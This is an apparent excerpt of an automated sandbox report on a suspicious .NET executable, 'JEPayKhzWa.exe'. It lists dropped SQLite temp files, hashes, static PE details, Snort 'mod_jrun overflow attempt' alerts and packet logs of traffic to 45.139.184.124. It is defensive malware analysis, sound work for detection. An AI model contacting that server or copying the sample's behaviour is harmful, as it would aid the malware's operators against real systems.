                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmp784C.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmpA7E8.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmpA7E9.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):73728
                                                                                Entropy (8bit):1.1874185457069584
                                                                                Encrypted:false
                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmpB316.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.792852251086831
                                                                                Encrypted:false
                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmpE571.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.792852251086831
                                                                                Encrypted:false
                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\tmpE5D0.tmp
                                                                                Process:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.792852251086831
                                                                                Encrypted:false
                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                Malicious:false
                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):3.7636603128417274
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:JEPayKhzWa.exe
                                                                                File size:373760
                                                                                MD5:f471bf615ef92f5ee73b48fe203373de
                                                                                SHA1:11f0b6de8d4baf8e039f6244438ebb05bc589923
                                                                                SHA256:d5608cba3115764a7758fa21c3e2f69724418dc48a8d0f5aaabe7efb71e2f28f
                                                                                SHA512:f06355be0e0e4f7996412c23f3feb703c4181678fbbe655cb9dad9e07c07186f7f5d9ae91e4cf33daaacdc29519bc0b5c047ee365e7ae19948c2b4074794738d
                                                                                SSDEEP:3072:TmY641YUVNCkr2R3ke4G39if7er133h2sgwqJO+mm58gCp3D9qp9PYBn8hoJ/UBg:N5LvCkr2Rn4G30Ta1nhgwqJmm58jAG1
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...np................0.............n.... ........@.. ....................... ............@................................

                                                                                File Icon

                                                                                Icon Hash:00828e8e8686b000

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x45c76e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows cui
                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                Time Stamp:0x99CD706E [Sun Oct 8 11:35:10 2051 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:v4.0.30319
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5c71c0x4f.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x2b0.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x5c7000x1c.text
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x5a7740x5a800False0.269563622238data3.77635536443IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x5e0000x2b00x400False0.302734375data2.19180297619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x600000xc0x400False0.025390625data0.0558553080537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_VERSION0x5e0580x254data

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Version Infos

                                                                                DescriptionData
                                                                                Translation0x0000 0x04b0
                                                                                LegalCopyright
                                                                                Assembly Version0.0.0.0
                                                                                InternalNameBantingism.exe
                                                                                FileVersion0.0.0.0
                                                                                ProductVersion0.0.0.0
                                                                                FileDescription
                                                                                OriginalFilenameBantingism.exe

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                07/22/21-11:43:29.538826TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4974280192.168.2.445.139.184.124
                                                                                07/22/21-11:43:29.538961TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4974280192.168.2.445.139.184.124
                                                                                07/22/21-11:43:29.538978TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4974280192.168.2.445.139.184.124
                                                                                07/22/21-11:43:29.539105TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4974280192.168.2.445.139.184.124
                                                                                07/22/21-11:43:29.539353TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4974280192.168.2.445.139.184.124
                                                                                07/22/21-11:43:29.539459TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4974280192.168.2.445.139.184.124
                                                                                07/22/21-11:43:29.960412TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4974280192.168.2.445.139.184.124
                                                                                07/22/21-11:43:31.663652TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4974480192.168.2.445.139.184.124

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 22, 2021 11:43:22.752034903 CEST4973580192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:22.835577011 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:22.835678101 CEST4973580192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:22.983927965 CEST4973580192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:23.067214966 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:23.067276001 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:23.067770958 CEST4973580192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:23.188040972 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:23.196957111 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:23.197016954 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:23.197073936 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:23.197120905 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:23.197146893 CEST4973580192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:23.197216988 CEST4973580192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:28.623575926 CEST4973580192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:28.706995964 CEST804973545.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:28.707055092 CEST4973580192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:28.767193079 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:28.851514101 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:28.852421999 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:28.854557037 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:28.937808037 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:28.937829971 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:28.938786030 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.022073984 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.022404909 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.022599936 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.022660971 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.022902966 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.023289919 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.023431063 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.023866892 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.024593115 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.106066942 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.106105089 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.106182098 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.106206894 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.106235027 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.106286049 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.106309891 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.106328964 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.107366085 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.107511997 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.144916058 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.145246983 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.189914942 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.190069914 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.190489054 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.190505028 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.190515041 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.190593004 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.190660954 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.190742970 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.190789938 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.191235065 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.191286087 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.191306114 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.191317081 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.191358089 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.191375017 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.191389084 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.191412926 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.191426039 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.192167044 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.192240953 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.192281008 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.192310095 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.192352057 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.192413092 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.192878962 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.194612026 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.233942986 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.234091997 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.274607897 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.274635077 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.274650097 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.274804115 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.275764942 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.275783062 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.275789976 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.275906086 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.276032925 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.276236057 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.276252985 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.276261091 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.276269913 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.276444912 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.276479959 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.276575089 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.276804924 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.276817083 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.276952028 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.277132988 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.277205944 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.277223110 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.277237892 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.277256012 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.277352095 CEST4974280192.168.2.445.139.184.124
                                                                                Jul 22, 2021 11:43:29.277385950 CEST804974245.139.184.124192.168.2.4
                                                                                Jul 22, 2021 11:43:29.277406931 CEST4974280192.168.2.445.139.184.124

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 22, 2021 11:42:49.910294056 CEST53545318.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:03.898483038 CEST4971453192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:03.948815107 CEST53497148.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:04.850111961 CEST5802853192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:04.903006077 CEST53580288.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:07.302659035 CEST5309753192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:07.360369921 CEST53530978.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:12.164897919 CEST4925753192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:12.214142084 CEST53492578.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:19.527348042 CEST6238953192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:19.584873915 CEST53623898.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:22.636591911 CEST4991053192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:22.728972912 CEST53499108.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:23.883752108 CEST5585453192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:23.935928106 CEST53558548.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:24.504048109 CEST6454953192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:24.565942049 CEST53645498.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:24.573537111 CEST6315353192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:24.633591890 CEST53631538.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:24.835891962 CEST5299153192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:24.887931108 CEST53529918.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:25.975275040 CEST5370053192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:26.024722099 CEST53537008.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:27.121279001 CEST5172653192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:27.177201986 CEST53517268.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:27.989456892 CEST5679453192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:28.039742947 CEST53567948.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:28.698682070 CEST5653453192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:28.758416891 CEST53565348.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:28.893409967 CEST5662753192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:28.945384979 CEST53566278.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:30.653006077 CEST5662153192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:30.711245060 CEST53566218.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:32.148741961 CEST6311653192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:32.197890997 CEST53631168.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:33.296094894 CEST6407853192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:33.352977991 CEST53640788.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:34.641422987 CEST6480153192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:34.693581104 CEST53648018.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:36.654804945 CEST6172153192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:36.705148935 CEST53617218.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:37.730602026 CEST5125553192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:37.848510027 CEST53512558.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:38.095741987 CEST6152253192.168.2.48.8.8.8
